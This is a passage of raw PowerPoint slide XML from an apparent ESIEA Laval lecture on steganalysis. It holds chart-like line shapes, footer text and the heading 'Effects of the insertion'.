        <p:spPr>
          <a:xfrm>
            <a:off x="8078564" y="5633937"/>
            <a:ext cx="2517" cy="99410"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1270" h="50164">
                <a:moveTo>
                  <a:pt x="974" y="49385"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="974" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="974" y="49385"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="49661"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="536" name="object 536"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8105924" y="5687833"/>
            <a:ext cx="1258" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="276" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="44925">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="537" name="object 537"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8104842" y="5644661"/>
            <a:ext cx="1258" cy="88084"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635" h="44450">
                <a:moveTo>
                  <a:pt x="0" y="43973"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="43973"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="546" y="44249"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="538" name="object 538"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8133831" y="5693732"/>
            <a:ext cx="1258" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="276" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="38961">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="539" name="object 539"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8133831" y="5655933"/>
            <a:ext cx="1258" cy="76759"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635" h="38735">
                <a:moveTo>
                  <a:pt x="546" y="38285"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="546" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="546" y="38285"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="38561"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="540" name="object 540"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8161681" y="5692924"/>
            <a:ext cx="1258" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="276" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="39789">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="541" name="object 541"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8159504" y="5655128"/>
            <a:ext cx="2517" cy="78018"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1270" h="39369">
                <a:moveTo>
                  <a:pt x="0" y="38691"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="38691"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1098" y="38967"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="542" name="object 542"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8189589" y="5698028"/>
            <a:ext cx="1258" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="276" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="34626">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="543" name="object 543"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8189588" y="5665607"/>
            <a:ext cx="0" cy="67951"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="34289">
                <a:moveTo>
                  <a:pt x="-2706" y="16839"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2706" y="16839"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="33679">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="544" name="object 544"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8217495" y="5698833"/>
            <a:ext cx="1258" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="276" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="33825">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="545" name="object 545"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8217493" y="5666359"/>
            <a:ext cx="2517" cy="66692"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1270" h="33655">
                <a:moveTo>
                  <a:pt x="1098" y="33024"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1098" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1098" y="33024"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="33300"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="546" name="object 546"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8245347" y="5693732"/>
            <a:ext cx="1258" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="276" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="38961">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="547" name="object 547"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8244265" y="5655933"/>
            <a:ext cx="1258" cy="76759"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635" h="38735">
                <a:moveTo>
                  <a:pt x="0" y="38285"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="38285"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="546" y="38561"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="548" name="object 548"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8272707" y="5690788"/>
            <a:ext cx="1258" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="276" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="41943">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="549" name="object 549"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8272706" y="5647546"/>
            <a:ext cx="2517" cy="85568"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1270" h="43180">
                <a:moveTo>
                  <a:pt x="698" y="42517"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="698" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="698" y="42517"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="42793"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="550" name="object 550"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8300885" y="5580603"/>
            <a:ext cx="0" cy="152260"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="76835">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="76570"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="551" name="object 551"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8298682" y="5581106"/>
            <a:ext cx="2517" cy="152260"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1270" h="76835">
                <a:moveTo>
                  <a:pt x="0" y="76045"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="76045"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="974" y="76321"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="552" name="object 552"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1215760" y="1730992"/>
            <a:ext cx="7113443" cy="4001549"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3589654" h="2019300">
                <a:moveTo>
                  <a:pt x="0" y="59"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="676" y="2018774"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3589491" y="2018715"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3589513" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="553" name="object 553"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6165070" y="12638854"/>
            <a:ext cx="5798470" cy="179536"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="25168">
              <a:lnSpc>
                <a:spcPts val="1367"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr spc="-50" dirty="0"/>
              <a:t>ESIEA </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-69" dirty="0"/>
              <a:t>Laval </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-129" dirty="0"/>
              <a:t>– </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-69" dirty="0"/>
              <a:t>Nicolas</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="89" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-59" dirty="0"/>
              <a:t>Bodin</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="554" name="object 554"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="7"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="13054948" y="12638854"/>
            <a:ext cx="4167651" cy="179536"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="50335">
              <a:lnSpc>
                <a:spcPts val="1367"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr spc="-129" dirty="0"/>
              <a:t>26 </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="89" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-69" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-129" dirty="0"/>
              <a:t>49</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="555" name="Rectangle 554"/>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extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="608414466"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>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4747" y="88033"/>
            <a:ext cx="1034363" cy="182999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="25168"/>
            <a:r>
              <a:rPr sz="1189" spc="-109" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>3.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1189" spc="-168" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1189" spc="-99" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:hlinkClick r:id="" action="ppaction://noaction"/>
              </a:rPr>
              <a:t>Steganalysis</a:t>
            </a:r>
            <a:endParaRPr sz="1189">
              <a:latin typeface="Verdana"/>
              <a:cs typeface="Verdana"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="object 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7765562" y="88033"/>
            <a:ext cx="820443" cy="182999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="25168"/>
            <a:r>
              <a:rPr sz="1189" spc="-30" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>B.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1189" spc="-159" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1189" spc="-99" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:hlinkClick r:id="" action="ppaction://noaction"/>
              </a:rPr>
              <a:t>Example</a:t>
            </a:r>
            <a:endParaRPr sz="1189">
              <a:latin typeface="Verdana"/>
              <a:cs typeface="Verdana"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="549737" y="682125"/>
            <a:ext cx="3396281" cy="426912"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="25168"/>
            <a:r>
              <a:rPr sz="2774" spc="-59" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1E536D"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Effects </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2774" spc="-79" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1E536D"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>of </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2774" spc="-99" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1E536D"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2774" spc="159" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1E536D"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2774" spc="-79" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1E536D"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>insertion</a:t>
            </a:r>
            <a:endParaRPr sz="2774">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1215762" y="5689672"/>
            <a:ext cx="66692" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
